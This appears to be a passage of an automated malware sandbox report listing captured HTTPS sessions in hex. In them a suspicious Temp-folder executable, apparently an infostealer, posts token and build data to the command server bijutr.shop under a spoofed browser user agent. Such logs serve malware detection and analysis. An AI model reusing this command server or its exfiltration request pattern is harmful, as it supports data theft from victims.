                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:07 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:09 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        19192.168.2.649893188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:08 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----WTRQIE37YCBIM7Q16XBI
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 493
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:08 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WTRQIE37YCBIM7Q16XBICont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:09 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                        20192.168.2.64993620.198.119.84443
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:24 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6e 6a 4b 6c 45 37 56 38 45 30 2b 55 6e 6e 65 55 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 36 31 35 30 37 31 33 62 34 32 39 31 30 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: njKlE7V8E0+UnneU.1Context: a66150713b42910d
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:24 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:24 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6e 6a 4b 6c 45 37 56 38 45 30 2b 55 6e 6e 65 55 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 36 31 35 30 37 31 33 62 34 32 39 31 30 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 33 63 4c 59 5a 74 57 55 43 4a 71 41 63 32 53 58 55 68 66 70 6a 5a 33 66 36 65 53 46 4b 64 6c 6d 68 64 33 31 75 6d 37 2f 73 33 47 51 59 34 79 33 62 4a 6a 34 71 7a 42 72 39 34 6e 69 75 51 39 4b 4b 61 52 44 4a 61 76 78 76 6e 37 75 51 65 36 43 72 53 74 31 76 46 51 6d 4d 42 6d 59 48 62 47 68 56 38 4b 71 4a 35 5a 64 4d 79 72 70
                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: njKlE7V8E0+UnneU.2Context: a66150713b42910d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrp
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:24 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6e 6a 4b 6c 45 37 56 38 45 30 2b 55 6e 6e 65 55 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 36 31 35 30 37 31 33 62 34 32 39 31 30 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: njKlE7V8E0+UnneU.3Context: a66150713b42910d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:24 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:24 UTC58INData Raw: 4d 53 2d 43 56 3a 20 38 73 2f 34 33 62 6e 41 47 30 6d 37 54 77 59 4e 42 4a 2f 57 61 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: 8s/43bnAG0m7TwYNBJ/Waw.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        21192.168.2.649951142.250.181.654437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:26 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                        Content-Length: 154477
                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC6S2jmC7QJw9b-GO0FcK3j_8jmaYtT4H0NPtvPxtsq_YC74RGO1fm5_nTZSJUOdT76aBedcQQY
                                                                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                        Expires: Wed, 24 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                        Age: 9013
                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                        ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC821INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                        Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC1390INData Raw: b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72
                                                                                                                                                                                                                                                                                                        Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC1390INData Raw: 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd
                                                                                                                                                                                                                                                                                                        Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC1390INData Raw: e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd
                                                                                                                                                                                                                                                                                                        Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iG
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC1390INData Raw: c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a
                                                                                                                                                                                                                                                                                                        Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC1390INData Raw: ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7
                                                                                                                                                                                                                                                                                                        Data Ascii: ^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
